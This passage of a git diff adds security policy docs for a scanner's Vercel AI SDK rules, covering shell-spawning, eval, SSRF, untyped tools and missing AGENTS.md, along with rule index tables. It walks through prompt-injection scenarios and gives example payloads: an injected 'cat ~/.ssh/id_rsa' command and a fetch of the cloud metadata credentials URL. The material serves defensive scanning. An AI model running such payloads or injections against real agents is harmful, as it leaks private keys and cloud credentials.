`.ts`/`.tsx` handler, so a `.js` `execute()` body can be a + coverage gap. + +--- + +## Recommendations beyond the fix + +```typescript +import { tool } from "ai"; +import { z } from "zod"; +import { Parser } from "expr-eval"; // a constrained expression parser + +const safeParser = new Parser(); // evaluates math, runs no code + +export const calculate = tool({ + description: "Evaluate a constant arithmetic expression and return the result.", + inputSchema: z.object({ expr: z.string() }), + execute: async ({ expr }) => { + try { + return { result: safeParser.evaluate(expr) }; // no eval / new Function + } catch { + return { error: "not a valid expression" }; + } + }, +}); +``` + +1. Remove `eval` / `new Function` from tool handlers. If the tool must interpret a + model-provided expression, parse it with a real parser into a constrained AST + you evaluate yourself. +2. If running code is genuinely the product, hand it to an isolated sandbox (a + separate process or a hardened runner with no filesystem, network, or + credentials) gated behind an explicit allow-list — never the in-process + evaluator. +3. Keep secrets out of `process.env` of any process that hosts an evaluation + tool, and never run such a tool with ambient cloud credentials. +4. Validate the tool's input with a typed `inputSchema` (see VAI-005) so the + handler receives a checked shape, not raw `unknown`. diff --git a/docs/Policy/vercel_ai/repo_hygiene.md b/docs/Policy/vercel_ai/repo_hygiene.md new file mode 100644 index 0000000..ac107bd --- /dev/null +++ b/docs/Policy/vercel_ai/repo_hygiene.md @@ -0,0 +1,119 @@ +--- +policy_id: vercel_ai_repo_hygiene +category: vercel_ai +topic: repo_hygiene +rules: + - id: VAI-012 + severity: low + confidence: 0.9 + scope: repo + fix_type: config +references: [LLM06] +--- + +# Policy Rationale: Vercel AI SDK Repo Hygiene + +**Policy ID:** `vercel_ai_repo_hygiene` +**File:** `vercel_ai/repo_hygiene.yaml` +**Rules:** VAI-012 +**Severities:** low +**Fix types:** config +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +A single repo-scope rule that fires once per scan. **VAI-012** fires when the repo +uses the Vercel AI SDK in code (predicate `repo_has_sdk_in_code` for `vercel_ai`) +but ships no agent-guidance doc — neither `AGENTS.md` nor `CLAUDE.md` is present as +a discovered repo component (predicate `repo_component_present`, negated). It reads +the scan inventory, not any single file. + +--- + +## Why a missing agent-guidance doc is a distinct concern for Vercel AI projects + +`AGENTS.md` is the cross-vendor convention an editing coding agent reads before it +acts on a repository. When neither it nor a `CLAUDE.md` is present, any agent that +opens this repo has no project-specific guidance on how its tools and agents must +be configured. For a Vercel AI project specifically, that means nothing in-tree +tells the agent whether provider execution tools (anthropic `bash`/`computer`, +openai `localShell`/`codeInterpreter`, google `codeExecution`) are permitted, how +tools must be typed and guarded, whether `maxSteps`/`stopWhen` is required, and +what the local test and build commands are. The likely consequence is generated +code that violates the project's own safety contract — an agent wiring +`anthropic.tools.bash` or an untyped `dynamicTool` because nothing taught it the +local rules. This is a soft, preventive form of excessive-agency risk (LLM06): the +guardrail that should constrain an editing agent's choices is absent, so the agent +operates with more latitude than the maintainers intend. + +--- + +## Rule-by-rule defense + +### VAI-012 — Project ships no agent-guidance doc (Severity: low, Confidence: 0.9, Fix type: config) + +**What we detect:** a repo that uses the Vercel AI SDK in code but has neither +`AGENTS.md` nor `CLAUDE.md` at the root (predicates `repo_has_sdk_in_code` + `not +repo_component_present`). + +**Why it is flaggable:** without an in-tree guidance doc, an editing agent has no +project-specific rules to follow and will reproduce unsafe patterns the +maintainers would reject. + +**Real-world consequence:** a developer asks a coding agent to "add a tool that +runs shell commands"; with no `AGENTS.md` stating provider execution tools are +forbidden, the agent wires `anthropic.tools.bash` into the loop — exactly the +pattern VAI-006 flags. + +**Why severity is low and not medium:** the absence of the doc causes no harm by +itself; it only raises the probability that *other* defects get introduced, so it +is a preventive nudge rather than a live vulnerability. **Fix type — config:** the +fix is adding a documentation file at the repo root — no application or tool code +changes. **Confidence 0.9:** presence of `AGENTS.md` / `CLAUDE.md` is an +unambiguous inventory check; the small gap covers projects that document agent +guidance somewhere the component scan does not recognize. + +--- + +## What this policy does not cover + +- The *content* or *quality* of an `AGENTS.md`. An empty or stale file satisfies + the rule; the rule checks presence, not whether the guidance is correct or + followed. +- Guidance kept somewhere other than a root `AGENTS.md` / `CLAUDE.md` — a wiki, a + `CONTRIBUTING.md`, or a nested per-package doc — counts as absent. +- Whether any agent actually reads the doc. The rule cannot verify that an editing + agent honors the guidance. +- It is a repo-scope nudge, not a per-agent or per-tool check — it says nothing + about the safety of any individual agent or tool in the repo. + +--- + +## Recommendations beyond the fix + +```markdown + +# Agent guidance + +## Safety rules +- Provider execution tools (anthropic bash/computer/codeExecution, openai + localShell/codeInterpreter, google codeExecution) are **forbidden**. +- Every `generateText`/`streamText` call sets `maxSteps` or `stopWhen`. +- Every tool has a `description` and a concrete Zod `inputSchema` — no + `dynamicTool` or `z.any()` without in-handler validation. +- Tools must not shell out or `fetch` model-supplied URLs without the net guard. + +## Commands +- Test: `pnpm test` +- Lint: `pnpm lint` +- Build: `pnpm build` +``` + +1. Add an `AGENTS.md` at the repo root (a `CLAUDE.md` also satisfies the rule). +2. State whether provider execution tools are permitted and under what guard, how + tools must be typed and constrained, and any required human-in-the-loop gates. +3. List the exact test, lint, and build commands so an editing agent can verify + its own changes. +4. Keep it short and concrete, and keep it current as the safety contract evolves. diff --git a/docs/Policy/vercel_ai/shell_safety.md b/docs/Policy/vercel_ai/shell_safety.md new file mode 100644 index 0000000..85743f5 --- /dev/null +++ b/docs/Policy/vercel_ai/shell_safety.md @@ -0,0 +1,131 @@ +--- +policy_id: vercel_ai_shell_safety +category: vercel_ai +topic: shell_safety +rules: + - id: VAI-001 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Vercel AI SDK Shell-Execution Safety + +**Policy ID:** `vercel_ai_shell_safety` +**File:** `vercel_ai/shell_safety.yaml` +**Rules:** VAI-001 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Vercel AI SDK tools whose `execute()` body spawns an OS process. **VAI-001** fires +on the `has_shell_call` fact, which discovery sets when a tool handler calls a Node +`child_process` primitive — `exec`, `execSync`, `spawn`, `spawnSync`, `execFile`, +or `fork`. The fact is set on both the bare and `child_process.`-qualified callee +forms. + +--- + +## Why shell execution is a distinct concern in Vercel AI tools + +A Vercel AI tool is exposed to the model via the agent's `tools` record, so the +model writes or selects the command string the handler runs. Shell execution +selected by model output is the most direct path from prompt injection to remote +code execution: the spawned process inherits the agent process's working +directory, environment variables (including API keys), filesystem credentials, and +outbound network. A single injected instruction that reaches `exec`/`execSync` runs +with the agent's full privileges. + +The Vercel-specific sharpening is that the `ai` core package ships *no* built-in +shell-tool primitive. Unlike frameworks with a first-class shell tool, a Vercel AI +project's only shell surface is a hand-rolled `execute()` that spawns a subprocess +— and it hides inside an ordinary-looking tool definition. That makes the +hand-rolled `child_process.exec(cmd)` the exact shape a reviewer must hunt for, +because nothing else in the SDK will surface it. + +--- + +## Rule-by-rule defense + +### VAI-001 — Tool execute() spawns a subprocess (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** a Vercel AI tool whose `execute()` handler invokes a +`child_process` primitive (`exec`, `execSync`, `spawn`, `spawnSync`, `execFile`, +`fork`) — the `has_shell_call` fact, set on the bare and qualified callee forms. + +**Why it is flaggable:** process spawn from a model-callable handler puts the OS +shell on the model's tool surface. The presence of the spawn is the signal; every +safeguard is bolted onto an inherently broad primitive. + +**Real-world consequence:** a `run(cmd)` tool forwarding a model string into +`exec(cmd)` is one prompt injection from arbitrary command execution — an injected +`cmd="cat ~/.ssh/id_rsa"` leaks the private key into the model context. + +**Why severity is high and not critical:** the fix usually means removing the +spawn or rearchitecting behind a typed API; it is not raised above high because +the exposure depends on what the handler does with the spawn, and the engine +reserves critical for unconditional RCE. **Fix type — code:** replacing the spawn +(or fronting it with an allow-list) is a tool-source edit. **Confidence 0.85:** +the fact is set on the recognized `child_process` callees, so a spawn hidden +behind a helper in another module escapes it, and a spawn through a less common +primitive outside the recognized set is a false negative. + +--- + +## What this policy does not cover + +- A spawn wrapped behind a helper defined in another module — discovery sees the + tool handler, so a wrapper elsewhere escapes the fact. +- Spawn primitives outside the recognized `child_process` set, or reached through + an aliased import (`import { exec as run } from "child_process"` used through a + further indirection). +- Whether the spawned command is safe. A literal `execFile("ls", ["/tmp"])` fires + even though it is comparatively benign — the fact flags the presence of the + primitive, not proof of model-control. +- TypeScript only: a tool defined in plain `.js` may not be analyzed with the same + fidelity as a typed `.ts` handler, so a `.js` `execute()` spawn can be a + coverage gap. +- File-system writes and network exfiltration through non-subprocess primitives + belong to other policies. + +--- + +## Recommendations beyond the fix + +```typescript +import { tool } from "ai"; +import { z } from "zod"; +import { execFile } from "node:child_process"; +import { promisify } from "node:util"; + +const run = promisify(execFile); + +export const gitLog = tool({ + description: "Return the last N git commits for the repo.", + inputSchema: z.object({ count: z.number().int().min(1).max(50) }), + execute: async ({ count }) => { + // Fixed binary + argv array; no shell string, no model-supplied command. + const { stdout } = await run("git", ["log", "-n", String(count), "--oneline"], { + timeout: 10_000, + }); + return { log: stdout }; + }, +}); +``` + +1. Replace shell-outs with a typed library call where one exists. If a subprocess + is unavoidable, use `execFile`/`spawn` with a fixed binary and an argument + array — never a shell string and never `exec(model_string)`. +2. Allow-list the exact commands permitted, and always pass `timeout=` — a model + can request an infinitely-running command. +3. Run the agent in a sandbox with dropped capabilities and a network egress + allow-list; pass a minimal `env` to the child rather than inheriting the + process environment. +4. Keep shell logic out of any model-callable tool, and log every spawned command + with the session ID for audit. diff --git a/docs/Policy/vercel_ai/ssrf.md b/docs/Policy/vercel_ai/ssrf.md new file mode 100644 index 0000000..68a0402 --- /dev/null +++ b/docs/Policy/vercel_ai/ssrf.md @@ -0,0 +1,138 @@ +--- +policy_id: vercel_ai_ssrf +category: vercel_ai +topic: ssrf +rules: + - id: VAI-003 + severity: high + confidence: 0.75 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Vercel AI SDK Server-Side Request Forgery + +**Policy ID:** `vercel_ai_ssrf` +**File:** `vercel_ai/ssrf.yaml` +**Rules:** VAI-003 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Vercel AI SDK tools whose `execute()` body fetches a URL the model controls. +**VAI-003** fires on the `has_dynamic_url_call` fact: a handler that issues an +outbound HTTP call (`fetch`, `axios`, `got`, `undici`) whose URL argument is not a +constant — it comes from the tool's arguments, a template string, or a +concatenation. A call to a hard-coded constant URL does not fire. + +--- + +## Why SSRF is a distinct concern in Vercel AI tools + +When the request URL is a literal, the developer chose the destination. When it is +built from a tool argument or a template, the *model* chooses the destination at +call time — and in a Vercel AI agent the model's choices are reachable by prompt +injection. A server-side request originates from inside the agent's network, so it +can reach what an external caller cannot: internal services on private CIDRs, +localhost admin ports, and the cloud metadata endpoint (169.254.169.254) that +hands out short-lived IAM credentials. A single injected instruction that +redirects the fetch to the metadata endpoint exfiltrates those credentials through +the model's next output. + +There is a second-order hazard specific to agents: the fetched body re-enters the +conversation as text the model reads, so an attacker who controls the fetched page +controls a fresh prompt-injection channel into the agent. The SSRF primitive is +both an outbound credential-theft path and an inbound injection path at once — +excessive agency (LLM06) even when the developer never intended the tool to reach +internal hosts. + +--- + +## Rule-by-rule defense + +### VAI-003 — Tool execute() fetches a model-controlled URL (Severity: high, Confidence: 0.75, Fix type: code) + +**What we detect:** a Vercel AI tool handler that issues an outbound HTTP call +(`fetch`/`axios`/`got`/`undici`) whose URL is non-literal — from an argument, a +template, or a concatenation (the `has_dynamic_url_call` fact). + +**Why it is flaggable:** a model-controlled request target lets a prompt injection +point the request at internal services or the metadata endpoint, and feeds the +response back into the conversation as untrusted text. + +**Real-world consequence:** a `fetchUrl({ url })` tool calling `fetch(url)` is +injected with +`url="http://169.254.169.254/latest/meta-data/iam/security-credentials/role"`; the +returned credentials are exfiltrated through the model's next reply. + +**Why severity is high and not critical:** SSRF is serious but its blast radius +depends on the host's network position (a host with no reachable internal services +or metadata endpoint gets far less); it is not the unconditional code execution +the engine reserves critical for. **Fix type — code:** constraining or hard-coding +the destination is an edit to the handler. **Confidence 0.75:** `fetch` is also +the everyday way to call a legitimate external API, so a non-literal URL is a +weaker signal of *intent* here than a shell or eval call — the rule over-fires on +tools that fetch a dynamic-but-vetted endpoint and under-fires when the URL is +assembled in a helper in another module, which is why confidence sits below the +shell/eval rules. + +--- + +## What this policy does not cover + +- A request whose URL is dynamic but already validated against an allow-list + inside the handler — the fact cannot see the guard, so it fires anyway (a known + false positive, and the main reason confidence is 0.75). +- A fetch assembled in a helper in another module — discovery sees the handler, so + a wrapper elsewhere escapes the fact. +- DNS-rebinding and time-of-check/time-of-use attacks against an allow-list that + validates the hostname but not the resolved IP — Node's `fetch` does not let you + pin the resolved address without a custom agent/dispatcher. +- TypeScript only: a tool defined in plain `.js` may not be analyzed with the same + fidelity as a typed `.ts` handler, so a `.js` `execute()` fetch can be a coverage + gap. +- Exfiltration or internal access through non-HTTP primitives (raw sockets, DNS) + belongs to other concerns. + +--- + +## Recommendations beyond the fix + +```typescript +import { tool } from "ai"; +import { z } from "zod"; +import { lookup } from "node:dns/promises"; +import ipaddr from "ipaddr.js"; + +const ALLOWED = new Set(["api.example.com"]); + +export const getStatus = tool({ + description: "Fetch a status path from the vetted API host only.", + inputSchema: z.object({ path: z.string() }), + execute: async ({ path }) => { + const url = new URL(`/${path.replace(/^\/+/, "")}`, "https://api.example.com"); + if (!ALLOWED.has(url.hostname)) return { error: "host not allowed" }; + const { address } = await lookup(url.hostname); + const range = ipaddr.parse(address).range(); + if (range !== "unicast") return { error: "resolves to a non-public address" }; + const res = await fetch(url, { redirect: "error", signal: AbortSignal.timeout(10_000) }); + return { body: await res.text() }; + }, +}); +``` + +1. If the tool only ever talks to one service, hard-code the base URL with `new + URL(path, BASE)` and accept only a path or query from the model — never a full + URL. +2. When a host must be dynamic, validate it against an allow-list, resolve the + hostname, and re-check the resolved IP against private / loopback / link-local + ranges to defeat DNS rebinding. +3. Set `redirect: "error"` (or validate each hop) so a 302 cannot bounce the + request into an internal address, and always set an `AbortSignal.timeout(...)`. +4. Treat the fetched body as untrusted — keep it out of the system prompt and do + not let it expand the agent's permissions. diff --git a/docs/Policy/vercel_ai/tool_definition.md b/docs/Policy/vercel_ai/tool_definition.md new file mode 100644 index 0000000..f1d10d7 --- /dev/null +++ b/docs/Policy/vercel_ai/tool_definition.md @@ -0,0 +1,162 @@ +--- +policy_id: vercel_ai_tool_definition +category: vercel_ai +topic: tool_definition +rules: + - id: VAI-004 + severity: low + confidence: 0.9 + scope: tool + fix_type: code + - id: VAI-005 + severity: medium + confidence: 0.8 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Vercel AI SDK Tool Definition Hygiene + +**Policy ID:** `vercel_ai_tool_definition` +**File:** `vercel_ai/tool_definition.yaml` +**Rules:** VAI-004, VAI-005 +**Severities:** low, medium +**Fix types:** code, code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Authoring hygiene for Vercel AI SDK tools built with `tool({...})` / +`dynamicTool({...})` from the `ai` package. **VAI-004** fires when the tool has no +`description` (predicate `has_docstring: false` over the description field). +**VAI-005** fires when the tool takes input but imposes no field types — it uses +`dynamicTool` (whose input is always `unknown`) or an open schema (`z.any()`, +`z.unknown()`, or an empty `z.object({})`) — predicates `has_params: true` AND +`has_typed_params: false`. The `description` is the only model-visible account of +the tool (the SDK has no docstring fallback), and the `inputSchema` is what the SDK +turns into the model's argument schema. + +--- + +## Why definition quality is a distinct concern in the Vercel AI SDK + +The model selects which tool to call and what arguments to pass entirely from the +`description` and the `inputSchema` — it never sees the `execute()` implementation. +The Vercel AI SDK is stricter than Python frameworks here: there is **no docstring +fallback**, so a tool defined with no `description` (or an empty one) reaches the +model as a bare name with zero account of what it does. The model then skips the +tool or calls it blindly. Likewise, the SDK builds the argument schema from +`inputSchema`; a `dynamicTool` (input `unknown`) or an open schema gives the model +no field-shape guidance, so it emits wrongly-shaped arguments that the SDK rejects +at validation time — or, worse, forwards unchecked into `execute()`. + +That last clause is why this policy references LLM06 rather than only the +output-handling concern: an untyped `inputSchema` does not merely cost reliability, +it widens the tool's input surface. If `execute()` consumes an `unknown` argument +without validating it, a model (or an injection) can pass a value the handler never +anticipated — a path, a URL, a command fragment — directly into the tool's logic. +Typing the input is the first guard that keeps a model-callable tool from being +fed arbitrary shapes. + +--- + +## Rule-by-rule defense + +### VAI-004 — Tool has no description (Severity: low, Confidence: 0.9, Fix type: code) + +**What we detect:** a `tool({...})` / `dynamicTool({...})` with no `description` +(or an empty one) — predicate `has_docstring` over the description field. + +**Why it is flaggable:** the SDK passes `description` to the model verbatim and has +no docstring fallback; with none, the tool is a bare name the model cannot reason +about. + +**Real-world consequence:** a `lookup` tool with no description is never selected +when the user asks a question it could answer, or is called with a nonsense +argument because the model is guessing at its purpose. + +**Why severity is low and not medium:** it is a routing-quality defect with no +direct security impact, and the failure mode (a skipped or mis-called tool) is +visible and recoverable. **Fix type — code:** adding a `description` to the +`tool({...})` options is a tool-source edit. **Confidence 0.9:** presence of a +`description` is unambiguous; the small gap covers a description supplied through +an unusual indirection the predicate does not model. + +### VAI-005 — Tool accepts untyped input (Severity: medium, Confidence: 0.8, Fix type: code) + +**What we detect:** a tool that takes input but imposes no field types — a +`dynamicTool` (input `unknown`) or an open schema (`z.any()`, `z.unknown()`, empty +`z.object({})`) — predicates `has_params` + `not has_typed_params`. + +**Why it is flaggable:** the SDK builds the model's argument schema from +`inputSchema`; an open schema gives no shape guidance, so the model emits +wrongly-typed arguments that fail validation or flow unchecked into `execute()`. + +**Real-world consequence:** a `transferFunds` tool with `inputSchema: +z.object({})` (or `dynamicTool`) lets the model pass `{ amount: "all", to: +"../admin" }`; with no field types the SDK forwards it unchecked and the handler +acts on a shape it never validated. + +**Why severity is medium and not low:** an untyped input is not just a reliability +tax — it widens the tool's attack surface, since unvalidated model-supplied values +reach `execute()` directly; that potential for a wrong-shaped value to cause a real +action lifts it above the description rule. **Fix type — code:** giving the tool a +concrete Zod object schema is a source edit. **Confidence 0.8:** the rule fires on +the open-schema shapes, so a `dynamicTool` that genuinely cannot be typed and +validates inside `execute()` is over-flagged, and a schema that is typed but still +loose (`z.record(z.any())`) may slip through as a false negative. + +--- + +## What this policy does not cover + +- The *quality* of a `description` or a schema: a one-word description or a + `z.record(z.string(), z.any())` satisfies the rules but barely constrains the + model. +- Whether `execute()` actually validates an `unknown` input from a `dynamicTool`. + A `dynamicTool` that validates internally still fires (a deliberate false + positive) — the rule cannot see the in-handler guard. +- Tool *naming*: a Vercel tool is keyed by its position in the agent's `tools` + record rather than a function name, so name-based heuristics (e.g. the mutation + prefix idempotency check that exists for Python SDKs) do not apply here — Vercel + ships no name-based rule, which is a deliberate coverage gap. +- TypeScript only: a tool defined in plain `.js` may not be analyzed with the same + fidelity as a typed `.ts` definition. +- Whether the schema matches the tool's real behavior — a misleading-but-present + description and a plausible-but-wrong schema both pass. + +--- + +## Recommendations beyond the fix + +```typescript +import { tool } from "ai"; +import { z } from "zod"; + +export const transferFunds = tool({ + description: + "Transfer an integer amount of cents from the user's account to a payee ID. " + + "Amounts are in cents; the payee must be an existing saved payee.", + inputSchema: z.object({ + amountCents: z.number().int().positive(), + payeeId: z.string().regex(/^payee_[a-z0-9]+$/), + }), + execute: async ({ amountCents, payeeId }) => { + // arguments arrive already validated against the schema + ... + }, +}); +``` + +1. Give every tool a `description` written for the model — there is no docstring + fallback — stating what it does, its inputs, and its return value. +2. Give the tool a concrete Zod object schema in `inputSchema` with a typed field + per argument; constrain values with `.int()`, `.positive()`, `.enum([...])`, + `.regex(...)` rather than bare `z.string()`. +3. Reserve `dynamicTool` for the rare case where the input genuinely cannot be + typed, and even then validate the shape inside `execute()` before using it. +4. Keep the description and the schema in sync with the handler's real behavior — + an overstated description is its own correctness hazard. diff --git a/pydantic_ai/POLICY_INDEX.md b/pydantic_ai/POLICY_INDEX.md new file mode 100644 index 0000000..c277525 --- /dev/null +++ b/pydantic_ai/POLICY_INDEX.md @@ -0,0 +1,21 @@ + +# Pydantic AI policy index + +12 rules — 7 tool · 4 agent · 1 repo + +Risk score = `severity_weight × confidence × 100` (engine formula; weights: low=0.15, medium=0.40, high=0.70). Higher = worse. + +| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | +| -- | ------- | ----------- | ----- | ----------------- | --------------------------------------------------------------------- | -------- | ---------- | ---- | ------------------------------------------------------------------------------------------------------------- | +| 1 | PYD-001 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool has no description | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/tool_definition.yaml) | +| 2 | PYD-002 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool parameters are not type-annotated | medium | 0.85 | 34.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/tool_definition.yaml) | +| 3 | PYD-003 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool body spawns a subprocess | high | 0.85 | 59.5 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/shell_safety.yaml) | +| 4 | PYD-004 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool body evaluates dynamic code | high | 0.85 | 59.5 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/code_execution.yaml) | +| 5 | PYD-005 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/ssrf.yaml) | +| 6 | PYD-006 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool network call has no timeout | high | 0.85 | 59.5 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/network.yaml) | +| 7 | PYD-007 | Pydantic AI | tool | pydantic_ai_tool | Mutating Pydantic AI tool has no idempotency key | medium | 0.55 | 22.0 | [idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/idempotency.yaml) | +| 8 | PYD-101 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent has no structured output validation | low | 0.70 | 10.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 9 | PYD-102 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent wires the code-execution native tool | high | 0.85 | 59.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 10 | PYD-103 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent wires a model-driven URL-fetching native tool | medium | 0.75 | 30.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 11 | PYD-105 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent retries with the exhaustive end strategy | low | 0.70 | 10.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 12 | PYD-201 | Pydantic AI | repo | pydantic_ai | Pydantic AI project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/repo_hygiene.yaml) | diff --git a/tools/gen_index.py b/tools/gen_index.py index c6becaf..51941aa 100644 --- a/tools/gen_index.py +++ b/tools/gen_index.py @@ -32,14 +32,18 @@ GH_BASE = "https://github.com/trustabl/trustabl-rules/blob/main/" GENERATED_MARKER = "" -SDK_ORDER = ["claude_sdk", "openai_sdk", "google_adk", "mcp", "langchain"] -SDK_LABEL = {"claude_sdk": "Claude SDK", "openai_sdk": "OpenAI SDK", "google_adk": "Google ADK", "mcp": "MCP", "langchain": "LangChain"} +SDK_ORDER = ["claude_sdk", "openai_sdk", "google_adk", "mcp", "langchain", "crewai", "autogen", "vercel_ai", "pydantic_ai"] +SDK_LABEL = {"claude_sdk": "Claude SDK", "openai_sdk": "OpenAI SDK", "google_adk": "Google ADK", "mcp": "MCP", "langchain": "LangChain", "crewai": "CrewAI", "autogen": "AutoGen", "vercel_ai": "Vercel AI", "pydantic_ai": "Pydantic AI"} SDK_FULL = { "claude_sdk": "Claude Agent SDK", "openai_sdk": "OpenAI Agents SDK", "google_adk": "Google ADK", "mcp": "Model Context Protocol", "langchain": "LangChain / LangGraph", + "crewai": "CrewAI", + "autogen": "AutoGen / AG2", + "vercel_ai": "Vercel AI SDK", + "pydantic_ai": "Pydantic AI", } SCOPE_ORDER = ["tool", "agent", "subagent", "repo"] @@ -60,8 +64,9 @@ All shipped rules across every SDK. ID prefix denotes the rule family: `CSDK-` Claude Agent SDK, `OAI-` OpenAI Agents SDK, `ADK-` Google ADK, -`MCP-` Model Context Protocol. Within a family: `NNN` tool-scope, `1NN` -agent / subagent scope, `2NN` repo scope. +`MCP-` Model Context Protocol, `LC-` LangChain / LangGraph, `CREW-` CrewAI, +`AG2-` AutoGen / AG2, `VAI-` Vercel AI SDK, `PYD-` Pydantic AI. Within a +family: `NNN` tool-scope, `1NN` agent / subagent scope, `2NN` repo scope. {risk} @@ -246,7 +251,10 @@ def main() -> int: drift.append(rel) else: path.parent.mkdir(parents=True, exist_ok=True) - path.write_text(content, encoding="utf-8", newline="\n") + # write_bytes (not write_text(newline=...)) keeps the output LF on + # every platform AND runs on Python 3.9 — write_text's newline kwarg + # is 3.10+, which crashed regeneration under the repo's default python3. + path.write_bytes(content.encode("utf-8")) print(f"wrote {rel}") if args.check: diff --git a/vercel_ai/POLICY_INDEX.md b/vercel_ai/POLICY_INDEX.md new file mode 100644 index 0000000..6633e70 --- /dev/null +++ b/vercel_ai/POLICY_INDEX.md @@ -0,0 +1,18 @@ + +# Vercel AI SDK policy index + +9 rules — 5 tool · 3 agent · 1 repo + +Risk score = `severity_weight × confidence × 100` (engine formula; weights: low=0.15, medium=0.40, high=0.70). Higher = worse. + +| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | +| - | ------- | --------- | ----- | --------------- | ----------------------------------------------------------------------- | -------- | ---------- | ---- | ----------------------------------------------------------------------------------------------------------- | +| 1 | VAI-001 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool execute() spawns a subprocess | high | 0.85 | 59.5 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/shell_safety.yaml) | +| 2 | VAI-002 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool execute() evaluates code (eval / new Function) | high | 0.90 | 63.0 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/code_execution.yaml) | +| 3 | VAI-003 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool execute() fetches a model-controlled URL | high | 0.75 | 52.5 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/ssrf.yaml) | +| 4 | VAI-004 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool has no description | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/tool_definition.yaml) | +| 5 | VAI-005 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool accepts untyped input | medium | 0.80 | 32.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/tool_definition.yaml) | +| 6 | VAI-006 | Vercel AI | agent | vercel_ai_agent | Vercel AI agent wires a provider shell / computer / code-execution tool | high | 0.85 | 59.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/agent_safety.yaml) | +| 7 | VAI-007 | Vercel AI | agent | vercel_ai_agent | Vercel AI agent tool loop has no step bound | medium | 0.60 | 24.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/agent_safety.yaml) | +| 8 | VAI-008 | Vercel AI | agent | vercel_ai_agent | Vercel AI agent forces a provider execution tool every step | medium | 0.65 | 26.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/agent_safety.yaml) | +| 9 | VAI-012 | Vercel AI | repo | vercel_ai | Vercel AI project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/repo_hygiene.yaml) |